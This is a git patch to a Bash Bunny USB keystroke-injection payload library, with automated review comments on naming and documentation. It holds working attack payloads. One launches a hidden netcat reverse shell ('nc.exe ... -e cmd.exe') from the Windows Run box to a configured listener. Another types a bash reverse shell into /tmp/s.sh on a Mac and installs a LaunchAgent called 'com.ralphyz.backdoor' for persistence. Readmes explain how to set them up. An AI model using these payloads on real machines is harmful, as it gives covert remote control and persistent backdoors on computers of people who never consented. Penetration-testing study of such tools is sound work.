From 750d384df7e6b9c0056992499cbbd8468f6747b6 Mon Sep 17 00:00:00 2001 
From: RalphyZ Date: Fri, 28 Apr 2017 18:49:35 -0400 Subject: [PATCH] Updated payloads for fw v1.1 (#176) * Mac Reverse Shell Starts a terminal window on a Mac, then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user-defined interval. * Mac Reverse Shell Starts a terminal window on a Mac, then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user-defined interval.
* Fixed additional MacReverseShell * Added readme.md files * Added readme.md files * Added readme.md * Added readme.md files * Added readme.md files * Updated for firmware 1.1 * Updated for firmware 1.1 * Added ThemeChanger and updated for firmware 1.1 * Updated readme.md * Updated for firmware 1.1 - using RUN command * Fixed issues with the new RUN - reverted * Fixed a few script problems * removed binary and updated readme.md * added a check for themepack * edited themechanger readme * updated readme.md and version --- payloads/library/execution/RAZ_VBScript/a.vbs | 35 +++++++------- .../execution/RAZ_VBScript/payload.txt | 35 +++++++++----- .../library/execution/RAZ_VBScript/readme.md | 31 ++++++++++++ .../prank/RAZ_ThemeChanger/payload.txt | 48 +++++++++++++++++++ .../library/prank/RAZ_ThemeChanger/readme.md | 34 +++++++++++++ .../RAZ_MacReverseShell/payload.txt | 25 ++++++---- .../RAZ_MacReverseShell/readme.md | 39 +++++++++++++++ .../RAZ_ReverseShell/payload.txt | 42 +++++++++------- .../remote_access/RAZ_ReverseShell/readme.md | 44 +++++++++++++++++ 9 files changed, 278 insertions(+), 55 deletions(-) create mode 100644 payloads/library/execution/RAZ_VBScript/readme.md create mode 100644 payloads/library/prank/RAZ_ThemeChanger/payload.txt create mode 100644 payloads/library/prank/RAZ_ThemeChanger/readme.md create mode 100644 payloads/library/remote_access/RAZ_MacReverseShell/readme.md create mode 100644 payloads/library/remote_access/RAZ_ReverseShell/readme.md diff --git a/payloads/library/execution/RAZ_VBScript/a.vbs b/payloads/library/execution/RAZ_VBScript/a.vbs index fd1a23a6..7d669b42 100644 --- a/payloads/library/execution/RAZ_VBScript/a.vbs +++ b/payloads/library/execution/RAZ_VBScript/a.vbs @@ -3,7 +3,7 @@ Option Explicit '============================================================================== ' Title: a.vbs ' Author: RalphyZ -' Version: 1.0 +' Version: 1.1 ' Target: Windows 7+ ' ' Description: 
@@ -16,7 +16,8 @@ Option Explicit ' listeners while doing a PenTest, and grab multiple reverse ' shells in one trip. Uncomment that if you want the auto-increment ' -' Note: You must put the netcat executable in the strReverseShellPath directory +' Note: You must put the netcat executable in the switch directory with this +' script in order for it to work '============================================================================== ' Declare Constants @@ -26,14 +27,11 @@ Const ForWriting = 2 ' Declare Global Variables Dim strListenerPort, strNewListenerPort, strListenerIP Dim objFSO, objFile, strCurrentDirectory -Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile +Dim strNetCatEXE, strListnerPortFile, strListenerIPFile ' The netcat executable name strNetCatEXE = "nc.exe" -' The folder location -strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" - ' The file containing the listener port strListnerPortFile = "listener_port.txt" @@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt" ' Create a File System Object Set objFSO = CreateObject("Scripting.FileSystemObject") -strCurrentDirectory = FindCurrentDirectory() +' Set default value +strCurrentDirectory = "" + +' The folder location +FindCurrentDirectory ' Read the Host IP Address (where the listener resides) ReadHostIP 
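Review bot: In the @@ -43,7 hunk the comment `' The folder location` now sits above the bare call `FindCurrentDirectory`, but it was written for the removed `strReverseShellPath` assignment and no longer says what the line does. The call fills the global `strCurrentDirectory`, which is pre-set to `""` two lines earlier, and a reader has to open the procedure to learn that; I'd replace the comment with `' Locate the switch folder that holds nc.exe (sets strCurrentDirectory; left "" if not found)`. The header note in the @@ -16,7 hunk already says the executable must sit in the switch directory, so the two comments would then agree. How an empty strCurrentDirectory is handled later (StartNetCat) is outside these hunks.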
@@ -64,20 +66,21 @@ StartNetCat ' Return Value: None ' Description: Find the netcat executable '============================================================================== -Function FindCurrentDirectory +sub FindCurrentDirectory Dim objDrives, d - - ' Set default return value - FindCurrentDirectory = "" - + ' Search all drives for the netcat exe Set objDrives = objFSO.Drives - For Each d in objDrives - If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then - FindCurrentDirectory = d + strReverseShellPath + For Each d in objDrives + If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch1\" + exit sub + ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch2\" + exit sub End if Next -End Function +End Sub '============================================================================== ' Name: ReadHostIP diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index b395f94f..ab24bd09 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt 
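Review bot: The rewritten procedure mixes keyword casing — `sub FindCurrentDirectory` and `exit sub` against `End Sub` — while every other keyword in the file (`Set`, `For Each`, `If`, `Const`) is capitalized; VBScript does not care, but the file is otherwise consistent, so I'd write `Sub FindCurrentDirectory` and `Exit Sub`. The `\payloads\switch1\` and `\payloads\switch2\` branches are the same test repeated with one literal changed; tolerable for two entries, but a loop over the folder names would be the place to go if a third is ever needed. The unchanged header above the procedure still reads `Description: Find the netcat executable`, yet the procedure now records a folder in strCurrentDirectory and returns nothing; `Description: Locate the switch folder containing the netcat executable and store it in strCurrentDirectory` would describe the new shape.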
@@ -2,34 +2,45 @@ # # Title: RAZ_VBScript # Author: RalphyZ -# Version: 1.0 +# Version: 1.1 # Target: Windows 7+ # Dependencies: VBScript (a.vbs) in the switch folder with this file # # Description: Executes a VBScript, concealed in a hidden PowerShell window # # Colors: -# Green.....................Working -# White.....................Completed without error -# Light-Blue (blinking).....a.vbs was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL | Red slow blink | Could not find the a.vbs script | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | -LED G +# Magenta solid +LED SETUP + +# Set the attack mode ATTACKMODE HID STORAGE # Get the switch position -source bunny_helpers.sh +GET SWITCH_POSITION -# Check if a.vbs is present -if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then - LED B G 100 + Check if a.vbs is present + if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED FAIL exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Run the VBScript QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe" QUACK ENTER -# Green LED for finished -LED R G B \ No newline at end of file + +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/execution/RAZ_VBScript/readme.md b/payloads/library/execution/RAZ_VBScript/readme.md new file mode 100644 index 00000000..3e0287ef --- /dev/null +++ b/payloads/library/execution/RAZ_VBScript/readme.md 
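Review bot: The added line `+ Check if a.vbs is present` has lost the leading `#` that the removed line carried, so as committed bash would try to execute a command named `Check` (a "command not found" error; with no `set -e` visible the payload then continues) — unless the `#` was dropped when this patch was rendered. The line should read `# Check if a.vbs is present`. The `if` and `LED FAIL` lines beneath it appear to have picked up a stray leading space in the same edit, which is harmless but worth tidying since the other payloads in this commit keep `if`/`fi` at column 0.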
@@ -0,0 +1,31 @@
+# RAZ_VBScript
+* Author: RalphyZ
+* Version: 1.1
+* Target: Windows 7+
+* Category: Execution
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+a.vbs - VBScript to be executed in a hidden Powershell window
+
+## Description
+VBScript (a.vbs) in the switch folder with this file
+
+## Configuration
+None
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL | Red slow blink | Could not find the a.vbs script |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file
diff --git a/payloads/library/prank/RAZ_ThemeChanger/payload.txt b/payloads/library/prank/RAZ_ThemeChanger/payload.txt
new file mode 100644
index 00000000..58e61540
--- /dev/null
+++ b/payloads/library/prank/RAZ_ThemeChanger/payload.txt
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title: Change windows theme
+# Author: sil3n7h
+# Version: 1.2
+# Target: Windows 7+
+#
+# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder
+# in the payloads library of the Bash Bunny USB Disk partition.
+#
+# Colors:
+# | Status | Color | Description |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
+# | FAIL1 | Red slow blink | Could not find the theme.themepack file |
+# | ATTACK | Yellow single blink | Running the VBScript |
+# | FINISH | Green blink followed by SOLID | Script is finished |
+
+# Magenta solid
+LED SETUP
+
+# Get the switch position
+GET SWITCH_POSITION
+
+# Check for all the files - error if not found. If found, put into variables
+if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then
+ LED FAIL1
+ exit 1
+fi
+
+# Set the attack mode to HID and STORAGE
+ATTACKMODE HID STORAGE
+
+# Yellow single blink
+LED ATTACK
+
+# Run the command to change the theme
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')"
+QUACK ENTER
+
+# Wait a bit so that the correct window closes
+QUACK DELAY 15000
+QUACK ALT F4
+
+# Green LED for finished
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/RAZ_ThemeChanger/readme.md b/payloads/library/prank/RAZ_ThemeChanger/readme.md
new file mode 100644
index 00000000..7d9f2645
--- /dev/null
+++ b/payloads/library/prank/RAZ_ThemeChanger/readme.md
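Review bot: The Colors table in the header describes ATTACK as `Running the VBScript`, but this payload opens theme.themepack from the Run box and no VBScript is involved; the row was evidently copied from RAZ_VBScript and should read `| ATTACK | Yellow single blink | Opening the theme file |`. The same row is repeated in the readme.md added for this payload in this commit. Separately, `QUACK ALT F4` after a fixed `QUACK DELAY 15000` goes to whichever window holds focus at that moment, which is not necessarily the theme window; the comment `# Wait a bit so that the correct window closes` should state that the 15 s figure is an assumption and that the keystroke closes the focused window, whatever it is.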
@@ -0,0 +1,34 @@
+# RAZ_ThemeChanger
+* Author: sil3n7h
+* Version: 1.2
+* Target: Windows 7+
+* Category: Prank
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ---------------------------------------|
+| 1.2 | Updated docs and check for themepack |
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
+
+Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`.
+
+## Description
+Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition.
+
+## Configuration
+None
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL1 | Red slow blink | Could not find the theme.themepack file |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file
diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
index 8c370623..2b384024 100644
--- a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
+++ b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title: RAZ_MacReverseShell
 # Author: RalphyZ
-# Version: 1.1
+# Version: 1.2
 # Target: Mac OSX
 # Dependencies: None
 #
@@ -12,8 +12,14 @@ # user-defined interval # # Colors: -# Green (blinking)..........Working -# White.....................Completed without error +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +#Magenta solid +LED SETUP # Edit this to point to the NetCat Listener LISTENER_IP="192.168.1.100" @@ -24,15 +30,15 @@ FREQUENCY="60" #----Proceed with Caution------------------------------------------------------ -# Green blinking LED -LED G 100 - # Human Interface Device ATTACKMODE HID # Emulate the Ducky - QUACK! QUACK DEFAULT_DELAY 300 +# Start the attack - yellow single blink +LED ATTACK + # Start the Mac Terminal QUACK COMMAND SPACE QUACK STRING terminal @@ -53,7 +59,7 @@ QUACK ENTER QUACK DELAY 500 # Add to the Launch Agents -QUACK STRING printf \"\\\n \\\n \Label\\\n \com.ralphyz.backdoor\\\n \ProgramArguments\\\n \\\n \/bin/sh\\\n \/tmp/s.sh\\\n \\\n \RunAtLoad\\\n \\\n \StartInterval\\\n \${FREQUENCY}\\\n \AbandonProcessGroup\\\n \\\n \\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist +QUACK STRING printf \"\\\Label\\com.ralphyz.backdoor\\ProgramArguments\\\/bin/sh\\/tmp/s.sh\\\RunAtLoad\\\StartInterval\\${FREQUENCY}\\AbandonProcessGroup\\\\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK ENTER QUACK DELAY 500 @@ -64,5 +70,6 @@ QUACK ENTER # Close the Terminal Window QUACK COMMAND q -# White LED for finished -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/readme.md b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md new file mode 100644 index 00000000..2e02f431 --- /dev/null 
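Review bot: The header version is bumped to 1.2 in the @@ -2,7 hunk, but the readme.md created for this payload in the same commit says `* Version: Version 1.1.1` and its change log stops at 1.1.1, so the two files disagree from the moment they land; the readme should carry `* Version: 1.2` and a matching change-log row. In the new Colors table the SETUP row says `getting the switch position` and the ATTACK row says `Running the VBScript`, yet in the hunks shown this payload never calls `GET SWITCH_POSITION` and types into the Mac Terminal rather than running a VBScript — the rows were copied from the Windows payloads; `| SETUP | Magenta solid | Setting attack mode |` and `| ATTACK | Yellow single blink | Typing the commands into Terminal |` would describe what the script does. `#Magenta solid` is also the only comment in the file without a space after `#`.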
+++ b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md
@@ -0,0 +1,39 @@
+# RAZ_MacReverseShell
+* Author: RalphyZ
+* Version: Version 1.1.1
+* Target: Mac OSX
+* Category: Reverse Shell
+* Attackmode: HID
+
+## Change Log
+| Version | Changes |
+| ------- | ---------------------------------------- |
+| 1.1.1 | Updated for firmware 1.1.1 |
+| 1.1 | Added variables for easier customization |
+| 1.0 | Initial release |
+
+## Dependencies
+None
+
+## Description
+Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup
+
+## Configuration
+Set the location of your listener:
+
+LISTENER_IP="192.168.1.100"
+
+LISTENER_PORT="4444"
+
+
+Set the frequency you want the script to run (in minutes)
+
+FREQUENCY="60"
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
+
diff --git a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
index 8b71a3d0..f97c94d7 100644
--- a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
+++ b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
@@ -13,63 +13,69 @@ # Intentionally, this script leaves a trace in the Run Box # # Colors: -# Green.....................Working -# White.....................Completed without error -# White (blinking)..........Incrementing the port in listener_port.txt -# Blue (blinking)...........listener_port.txt was not found -# Light-Blue (blinking).....listener_ip.txt was not found -# Amber (blinking)..........nc.exe was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the listener_port.txt file | +# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +# | FAIL3 | Red very fast blink | Could not find the nc.exe file | +# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | +# Magenta solid +LED SETUP # Change this if you want to enable auto_increment of the netcat port # If true, the port number is increased by 1 everytime the script runs # This is good for Red Teams doing PenTesting on multiple computers auto_increment=false -LED G +# Set attack mode to HID and Storage ATTACKMODE HID STORAGE -LANGUAGE='us' - # Get the switch position -source bunny_helpers.sh - +GET SWITCH_POSITION # Check for all the files - error if not found. If found, put into variables if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then - LED B 100 + LED FAIL1 exit 1 else my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then - LED B G 100 + LED FAIL2 exit 1 else my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` fi if [ ! 
-f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then - LED R G 100 + LED FAIL3 exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Execute the powershell command in the run box with the appropriate variables QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\" QUACK ENTER + # If auto_increment, then update the listener_port file if [ "$auto_increment" = true ] ; then - LED R G B 100 + LED SPECIAL echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt # Allow the write to sync to the USB sleep 1 fi -# Signal everything went OK - white -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH exit 0 diff --git a/payloads/library/remote_access/RAZ_ReverseShell/readme.md b/payloads/library/remote_access/RAZ_ReverseShell/readme.md new file mode 100644 index 00000000..f2f2aa3d --- /dev/null +++ b/payloads/library/remote_access/RAZ_ReverseShell/readme.md 
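Review bot: The new Colors table's ATTACK row reads `Running the VBScript`, but this payload launches nc.exe from the Run box and contains no VBScript; the row was copied from RAZ_VBScript and should say `| ATTACK | Yellow single blink | Launching nc.exe from the Run box |`. The same row appears in the readme.md added for this payload in this commit. The hunk header's `# Magenta solid` / `LED SETUP` pair is dropped in without a blank line after the table, unlike the other payloads in this commit that separate the two; a blank line before `# Magenta solid` would keep the header block readable.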
@@ -0,0 +1,44 @@
+# RAZ_ReverseShell
+* Author: RalphyZ
+* Version: 1.1
+* Target: Windows 7+
+* Category: Reverse Shell
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+nc.exe - Windows binary for netcat with the -e flag
+
+Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
+
+listener_port.txt - The Port number for the netcat listener
+
+listener_ip.txt - The IP Address for the netcat listener
+
+## Description
+Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
+
+## Configuration
+Set the location of your listener in the listener_ip and listener_port text files.
+
+If you want the listener port to auto-increment, set:
+
+auto_increment=true
+
+## Colors
+| Status | Color | Description |
+| ---------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL1 | Red slow blink | Could not find the listener_port.txt file |
+| FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
+| FAIL3 | Red very fast blink | Could not find the nc.exe file |
+| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file